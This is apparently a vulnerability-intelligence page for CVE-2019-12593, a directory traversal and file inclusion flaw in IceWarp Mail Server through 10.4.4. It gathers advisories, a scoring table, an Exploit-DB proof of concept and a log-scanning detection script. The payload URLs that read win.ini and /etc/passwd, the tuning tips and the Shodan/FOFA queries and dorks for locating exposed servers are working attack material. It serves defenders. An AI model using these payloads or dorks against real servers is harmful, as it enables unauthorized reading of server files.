CVE-2019-12593
Published 2019-06-03
CVE-2019-12593: IceWarp Mail Server through 10.4.4 is prone to a local file inclusion vulnerability via webmail/calendar/minimizer/index.php?style=..%5c directory traversal.
Priority: P179 · high · 7.5 (CVSS 3.0)
AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:N / A:N
ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 40.97% (98.5th percentile)
Affected
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| icewarp | mail_server | <= 10.4.4 | — |
Detection & IOCs (extracted from sources)
- url: /webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
- url: /webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd
- Detect LFI exploitation attempts by monitoring HTTP GET requests to /webmail/calendar/minimizer/index.php containing the 'style' parameter with encoded backslash traversal sequences (%5c).
- A successful exploitation response for Windows targets will contain the string '[intl]' (from win.ini); for Linux targets it will contain 'root:x:0' (from /etc/passwd). Alert on HTTP 200 responses from the vulnerable path containing these strings.
- Use Shodan/FOFA queries to identify exposed IceWarp instances as potential targets: search for title 'icewarp' or 'icewarp server administration'.
- Google dork 'Powered By IceWarp 10.4.4' or 'intitle:"icewarp server administration"' can identify publicly exposed vulnerable instances.
- The traversal payload uses Windows-style encoded backslashes (%5c). On Linux targets, the path separator differs; the nuclei template uses a mixed path ('..%5c..%5c.../etc%5cpasswd') suggesting the server may normalize separators. Adjust traversal depth and separator encoding based on target OS.
- The exploit was tested on Windows 10. The traversal depth used is 8 levels (..%5c repeated 8 times) to reach the filesystem root; fewer levels may be needed depending on the IceWarp installation path.
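The monitoring guidance above, applied to web server access logs, as an added example that is not part of the original page or of any referenced project. It assumes Apache/nginx "combined" log lines; the sample lines, the documentation-range IP addresses and the benign `style=default` value are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

VULN_PATH = "/webmail/calendar/minimizer/index.php"
TRAVERSAL = re.compile(r"\.\.[\\/]")     # ".." + either separator, after decoding
LEAK_MARKERS = ("[intl]", "root:x:0")    # win.ini / /etc/passwd content named on the page
LOG_RE = re.compile(                     # assumed "combined" access-log layout
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [03/Jun/2019:10:00:00 +0000] "GET /webmail/calendar/minimizer/index.php'
    '?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1" 200 512',
    '198.51.100.9 - - [03/Jun/2019:10:00:05 +0000] "GET /webmail/calendar/minimizer/index.php'
    '?style=default HTTP/1.1" 200 2048',
    '203.0.113.7 - - [03/Jun/2019:10:00:09 +0000] "GET /webmail/calendar/minimizer/index.php'
    '?style=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C/etc%5Cpasswd HTTP/1.1" 404 0',
]

def classify(line):
    """Return a finding dict for a traversal request to the minimizer, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    if unquote(url.path).lower() != VULN_PATH:
        return None
    # parse_qs percent-decodes once, so %5c and %5C both become a backslash
    styles = parse_qs(url.query, keep_blank_values=True).get("style", [])
    if not any(TRAVERSAL.search(s) for s in styles):
        return None
    status = int(m["status"])
    # An access log has no body: a 200 is escalated for response inspection
    return {"ip": m["ip"], "status": status,
            "verdict": "review-response" if status == 200 else "attempt"}

def response_leaks(body):
    """Check a captured response body for the file-content markers."""
    return any(marker in body for marker in LEAK_MARKERS)

def scan(lines):
    """Classify every line and keep only the findings."""
    return [f for f in map(classify, lines) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

`response_leaks` is meant for bodies captured by a proxy or WAF for the requests that `classify` marks `review-response`.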
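CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.0 | 7.5 | HIGH | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |
| nvd | v2.0 | 5.0 | MEDIUM | AV:N/AC:L/Au:N/C:P/I:N/A:N |
| vulncheck | — | 7.5 | HIGH | — |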
GHSA
GHSA-46v5-x5rw-m988: IceWarp Mail Server through 10
ghsa_unreviewed·2022-05-24
IceWarp Mail Server through 10.4.4 is prone to a local file inclusion vulnerability via webmail/calendar/minimizer/index.php?style=..%5c directory traversal.
VulnCheck
icewarp mail_server Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
vulncheck·2019·CVSS 7.5
IceWarp Mail Server through 10.4.4 is prone to a local file inclusion vulnerability via webmail/calendar/minimizer/index.php?style=..%5c directory traversal.
Affected: icewarp mail_server
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-26&host_type=src&vulnerability=cve-2019-12593; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-14&host_type=src&vulnerability=cve-2019-12593; https://dashboard.shadowserver.org/statistics/honeypot/vulnera
No detection rules found.
Exploit-DB
IceWarp 10.4.4 - Local File Inclusion
exploitdb·2019-06-04·CVSS 7.5
---
# Exploit Title: IceWarp <=10.4.4 local file include
# Date: 02/06/2019
# Exploit Author: JameelNabbo
# Website: uitsec.com
# Vendor Homepage: http://www.icewarp.com
# Software Link: https://www.icewarp.com/downloads/trial/
# Version: 10.4.4
# Tested on: Windows 10
# CVE: CVE-2019-12593
POC:
http://example.com/webmail/calendar/minimizer/index.php?style=[LFI]
Example:
http://example.com/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
Nuclei
IceWarp Mail Server <=10.4.4 - Local File Inclusion
nuclei·CVSS 7.5
IceWarp Mail Server through 10.4.4 is prone to a local file inclusion vulnerability via webmail/calendar/minimizer/index.php?style=..%5c directory traversal.
Template:
```yaml
id: CVE-2019-12593

info:
  name: IceWarp Mail Server <=10.4.4 - Local File Inclusion
  author: pikpikcu
  severity: high
  description: |
    IceWarp Mail Server through 10.4.4 is prone to a local file inclusion vulnerability via webmail/calendar/minimizer/index.php?style=..%5c directory traversal.
  impact: |
    An attacker can read sensitive files on the server, potentially leading to unauthorized access, data leakage, or further exploitation.
  remediation: |
    Upgrade IceWarp Mail Server to a version higher than 10.4.4 or apply the vendor-provided patch to fix the LFI vulnerability.
```
References
- http://packetstormsecurity.com/files/153161/IceWarp-10.4.4-Local-File-Inclusion.html
- https://github.com/JameelNabbo/exploits/blob/master/IceWarp%20%3C%3D10.4.4%20local%20file%20include.txt